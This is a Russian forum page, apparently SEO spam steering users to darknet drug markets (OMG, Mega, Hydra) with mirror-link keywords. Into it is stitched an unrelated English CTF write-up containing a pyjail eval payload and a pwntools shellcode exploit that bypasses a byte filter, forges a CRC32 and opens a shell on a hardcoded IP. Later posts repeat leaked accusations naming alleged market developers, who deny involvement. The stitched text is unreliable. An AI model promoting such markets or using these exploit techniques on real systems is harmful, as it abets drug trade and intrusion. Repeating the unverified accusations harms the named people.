Как правильно заходить на omgomgomg

Wurefaj

Поддержка
Подтвержденный
Сообщения
669
Реакции
50
Уважаемые пользователи RuTOR ,  Остерегайтесь фишинг сайтов и помните об уголовной ответственности за незаконные сделки.

 

MEGA - DARKNET MARKET

Благодаря хорошей подготовке и листингу на зарубежных сайтах площадка смогла составить конкуренцию в стабильности и доступности, чего не смогли ее конкуренты, но все же она уступает по полпулярности площадке OMG!OMG!

 

 

________________________
RUTOR — Главная торговая и информационная площадка в сети Tor.

правильная ссылка на mega, мега вход, mega ссылка, ссылка на мегу в тор, мега тор, мега через тор, ссылка на мегу онион, правильная ссылка на omg omg, ссылка на omgomg в тор, omg tor ссылка, ссылка вход в omgomg, омг сайт официальный настоящий, актуальная ссылка на omgomg, официальная ссылка omg, настоящая ссылка на omgomg, вход в omgomg зеркало, омг онион ссылка зеркало, омг через зеркало, сайт омг в обход блокировки, ссылка на omgomg вход, рабочие зеркала omg, омг сайт onion, сайт омг оригинал, ссылка на сайт омг онион, правильная ссылка на гидра, hydra ссылка, ссылка на гидру в тор, гидра тор, hydra ссылка на сайт рабочая, настоящая ссылка на гидру, актуальная ссылка на hydra, официальная ссылка гидра, ссылка вход в hydra, вход на гидру зеркало
 








 


 

 

M

Mavaja

Продвинутый юзер
Сообщения
88
Реакции
14
Как правильно заходить на omgomgomg
This is my write-up for recent hack you spb CTF - a CTF for newbies. I guess I'm a bit older here ahaha.Reverse 100:#include <stdio.h>#include <string.h>int main() { char buf[64]; gets(buf); int l = strlen(buf); if (l * l!= 144) return 1; unsigned int a = buf[0] | (buf[4] << 8) | (buf[8] << 16); unsigned int b = buf[1] | (buf[5] << 8) | (buf[9] << 16); unsigned int c = buf[2] | (buf[6] << 8) | (buf[10] << 16); unsigned int d = buf[3] | (buf[7] << 8) | (buf[11] << 16); if (!(((a % 3571) == 2963) && (((a % 2843) == 215)) && (((a % 30243) == 13059)))) return 2; if (!(((b % 80735) == 51964) && (((b % 8681) == 2552)) && (((b % 40624) == 30931)))) return 3; if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651)))) return 4; if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510)))) return 5; printf("Congratulations %s is flag\n",buf); return 0;}First of all, I think about use something like z3, or any SAT that could give me the valid number. But z3 took a lot of time, so I decided to look deeper... Yes, you could finger out there is a pattern (x % number1 == number2), so you could apply Chinese remainder theorem to get a, b, c.Reverse 200:
This is a.pyc file, which is a file contain python byte-code. As usual, for byte-code relative problems, I search for some python byte-code decompiler and found pycdc.
After decompil, you should get something like this# Source Generated with Decompyle++# File: rev200_bot_7b541a1.pyc (Python 2.7)import configimport tracebackimport refrom base64 import *from twx.botapi import TelegramBot, ReplyKeyboardMarkup, ReplyKeyboardHidesec_state = { }def process_message(bot, u):Warning: Stack history is not empty! if u.message.sender and u.message.text and u.message.chat: chat_id = u.message.chat.id user = u.message.sender.username reply_hide = ReplyKeyboardHide.create() print 'user:%s mes:%s' % (user, u.message.text) if user not in sec_state: sec_state[user] = { 'mode': 15, 'stage': 7 } cmd1 = u.message.text.encode('utf-8') a = re.findall('(\\/\\w+)\\s*(.*)', cmd1) if a: cmd = a[0][0] data = a[0][1] if cmd == '/help': bot.send_message(chat_id, 'Usage: \n\n/help - show this help\n/enter - enter secret mode\n', reply_markup = reply_hide) if cmd == '/enter': keyboard = [ [ '-7-', '-8-', '-9-'], [ '-4-', '-5-', '-6-'], [ '-1-', '-2-', '-3-'], [ '-0-']] reply_markup = ReplyKeyboardMarkup.create(keyboard) bot.send_message(chat_id, 'please enter access code', reply_markup = reply_markup).wait() if sec_state[user]['mode'] == 0 and cmd == '/7779317': ddd = b64decode(data) bot.send_message(chat_id, eval(ddd)) a = re.findall('-(\\d+)-', cmd1) if a: num = a[0] if int(num) == sec_state[user]['stage']: sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: bot.send_message(chat_id, 'Secret mode enabled!', reply_markup = reply_hide).wait() else: print 'NO', num, sec_state[user]['stage'] bot.send_message(chat_id, 'Invalid password!', reply_markup = reply_hide).wait() sec_state[user]['mode'] = 15 bot = TelegramBot(config.token)bot.update_bot_info().wait()print bot.usernamelast_update_id = 0while True: updates = bot.get_updates(offset = last_update_id).wait() try: for update in updates: if int(update.update_id) > int(last_update_id): last_update_id = update.update_id process_message(bot, update) continue continue except Exception: ex = None print traceback.format_exc() continue So this is a kind of chat-bot server based on Telegram.
There is eval function inside, bot.send_message(chat_id, eval(ddd)), so I need to control ddd which is a base64 decoded string from data we sent. Before that, I need to enter Secret mode by enter correct access code (0-9).
First, set sec_state[user]['mode'] = 0; First time, stage init to 7, that changed everytime you press the correct key; But if I dont remember the stage, I still could find out by bruteforce from 0 to 9, if I didn't recv incorrect message that's mean I pressed the correct one; then by use the following script, I'm able to access secret area;#coding: utf-8sec_state = { }user = "A"sec_state[user] = {'mode': 15,'stage': 7 } # bruteforce numbersec_state[user]['mode'] = 15r = []while 1: num = sec_state[user]['stage'] r.append(num) print "-%d-" % num sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: breakprint sec_state[user]['mode']Next, this is a pyjail, so I can't execute normal python command...
So, final payload is `str(().__class__.__base__.__subclasses__()[40]("flag","r").read())`or `/7779317 c3RyKCgpLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgiZmxhZyIsInIiKS5yZWFkKCkp`Reverse 300:
Let's get some fun.let reverse this (or not?), look at handler (the main function)ssize_t __cdecl handler(int fd){ ssize_t result; // [email protected] unsigned int buf; // [sp+20h] [bp-18h]@1 int v3; // [sp+24h] [bp-14h]@1 char *v4; // [sp+28h] [bp-10h]@4 int v5; // [sp+2Ch] [bp-Ch]@4 buf = 0; setuid(0x3E8u); seteuid(0x3E8u); setgid(0x3E8u); setegid(0x3E8u); result = recv(fd, &buf, 4u, 0); v3 = result; if ( result == 4 ) { result = buf; if ( buf <= 0xC8 ) { v4 = (char *)mmap(0, buf, 7, 33, -1, 0); v3 = recv(fd, v4, buf, 0); result = crc32(0, v4, buf); v5 = result; if ( result == 0xCAFEBABE ) { result = filter(v4, buf) ^ 1; if (!(_BYTE)result ) result = ((int (*)(void))v4)(); } } } return result;}So the basic idea is make result == 0xCAFEBABE, so the program will execute v4 as shellcode (function pointer), but you also need to bypass the filter function - check if contain any of 0x0, 0x1, 0x2f, 0x68, 0x73 ( so I can't use sh in plaintext)then exit; So, I did the following step:1. Find a program that can make crc32 of my shellcode equal 0xCAFEBABE
2. Make a great shellcode and Bypass filter.
By search google for everything, the answer for problem 1 is force-crc32.
Currently I'm also trying to learn some binary exploit com method, write a shellcode isn't hard (hint xor), but if there is any framework that's good enough as pwntools , you shoud try at least once.
Basicaly, I import pwns and let pwntools do the rest;from pwn import *import socket, struct, telnetlibdef getCRC(data): import subprocess with open('/tmp/12', 'wb') as f: f.write(data + "123456") subprocess.check_output(['python', 'forcecrc32.py', '/tmp/12', str(len(data)+1), 'CAFEBABE']) with open('/tmp/12', 'rb') as f: data = f.read() return datadef crc32(data):# recheck import zlib return (zlib.crc32(data)) & 0xffffffffd = ""d += asm(pwnlib.shellcraft.i386.linux.dup2(4,0))d += asm(pwnlib.shellcraft.i386.linux.dup2(4,1))# i need dup2 because the program use itself as serverd += asm(pwnlib.shellcraft.i386.linux.sh())fsc = pwnlib.encoders.encoder.encode(d, '\n\x01\0\x2f\x73\x68')print len(fsc)fsc = getCRC(fsc) # it didn't contain any blocked char, so i dont need to re-generate again.print hex(crc32(fsc))#yes, i love my custom socket lib 🙁s = socket.create_connection(("78.46.101.237", 3177))s.send(p32(len(fsc)))s.send(fsc)s.send("\n")s.send("cat flag*\n") print s.recv(1024)To be continued....Related
 

Ygigeqon

Местный
Сообщения
59
Реакции
6
Omg ссылка tor omg2support comEpecajylomg-Onion работает через анонимные прокси-сервера Тора браузера, тем самым позволяет обойти любые блокировки сайтов и скрыть свою личность в простом браузере. Забанили на гидре что делать Dec 13, 2021 Cis Вы забанены. Правильно не Gidra, Hidra, Хидра, Union. В мире существует много маркетплейсов,.…
Как правильно заходить на omgomgomg
 

Loket

Юзер
Сообщения
84
Реакции
10
Генпрокуратура Франкфурта-на-Майне, Центральное управление по борьбе с интернет-преступностью и федеральная уголовная полиция сообщили об аресте серверов крупнейшей в мире даркнет-площадки «ОМГ» (omg Market). Речь идёт о крупнейшей площадке для торговли наркотиками и крадеными данными.Германия вела расследование против omg Market с августа 2021 года при содействии США. Если верить правоохранителям, им удалось изъять биткойны на сумму, эквивалентную примерно 23 миллионам евро. На данный момент это немногим менее 500 биткойнов.Нелегальная торговая площадка omg Market представляла собой русскоязычную платформу даркнета, доступ к которой через сеть Tor был как минимум с 2015 года. Их внимание было сосредоточено на торговле наркотиками, кроме того, через платформу предлагались украденные личные данные, поддельные документы и цифровые услуги.Сейчас силовики пытаются установить операторов и администраторов «Гидры». Их хотят привлечь за торговлю наркотиками, эксплуатацию криминальных площадок и отмывание денег.На торговой площадке было зарегистрировано около 17 миллионов клиентов и более 19 000 продавцов. Эксперты утверждают, что среди нелегальных ресурсов «ОМГ» имела самый большой оборот в мире — только за 2020 год он составил не менее 1,23 миллиарда евро.
 

Gyzurure

Юзер
Сообщения
26
Реакции
13
В сети появились якобы контактные данные предполагаемых разработчиков «Гидры» — крупнейшей в России площадки по торговле наркотиками в даркнете. Тот, кто слил эту информацию, утверждает, что пытался договориться с командой разработчиков проекта о выкупе, но после неудачных попыток решил опубликовать данные.По словам неизвестного, сведения о людях, которые делают «Гидру», ему удалось раскрыть в результате продолжительной DDOS-атаки на сайт. Благодаря некоторым фрагментам кода, который разработчики убрали через три часа после его появления, автор якобы смог установить личность администратора под псевдонимом Аскольд Монархов.Затем он выяснил, что под этим псевдонимом скрывается гражданин Украины Колеснев Богдан Русланович — разработчик торговых и финансовых систем, ориентированных на рынок ПАВ. Помимо Колеснева, по его словам, в команду разработчиков входит некий Александр Дырявин из Чернигова, который отвечает за имейл-, СМС- и мессенджер-маркетинг в компании SendPulse.Подробности того, как ему удалось найти личные данные предполагаемых разработчиков «Гидры», он выложил на сайте omg.expert.«Афише Daily» удалось дозвониться по номеру, который якобы принадлежит Дырявину. Человек на другом конце провода представился Денисом и сказал, что не знает, кто такой Александр Дырявин и никогда не слышал о «Гидре». Он заявил, что находится в шоке от происходящего, и что с утра ему уже звонили с подобными вопросами. Собеседник подтвердил, что живет в Украине, однако о роде своей деятельности и других подробностях личной жизни уточнять не стал. По второму номеру никто так и не ответил.Комментарий от человека, который представился Александром Дырявиным, удалось получить по почте. Он заявил, что является обычным рядовым разработчиком, который никогда не разрабатывал продуктов и сайтов, используемых в теневом бизнесе. До вчерашнего дня, по его словам, он даже не знал о существовании «Гидры». Другие контакты, указанные на сайте и приписываемые Дырявину, за исключением номера телефона, принадлежат ему, подтвердил собеседник.Данные, которые указаны в статье, взяты из открытых источников. Факт моей регистрации на каком то из серверов gitlab лишь доказывает то, что я являюсь разработчиком, но не мое причастие к разработке к порталу по торговле наркотиками. Если получить доступ к серверу который указан в статье — то мои слова можно будет проверить. Больше мне нечего добавить.В контактах, якобы принадлежащих Богдану Колесневу, указаны группа в «ВКонтакте» проекта «Telebot Community» по созданию ботов для Telegram, телеграм-канал под названием «Наркотики зло» с 7 подписчиками, страница в «ВКонтакте» некоего Александра Птушкина, твиттер-аккаунт пользователя Askold Monarkhov и резюме Колеснева Богдана на сайте work.ua.С почтового ящика, который приписывается Колесневу, нам пришел следующий ответ: «Мои разработки под заказ начали использовать в целях, о которых мне не сообщали. Но даже при этом там мои разработки использовались не в „Гидре“, а в каких‑то других проектах, отношения к которым я не имею».«ОМГ» — сайт в даркнете, выполняющий роль посредника между продавцами наркотических веществ и их покупателями. Помимо наркотиков, на площадке можно купить поддельные купюры, хакерские услуги, фальшивые документы и другие запрещенные товары. За год, по подсчетам издания «Проект», площадка зарабатывает больше 1 млрд рублей.
 
Сверху Снизу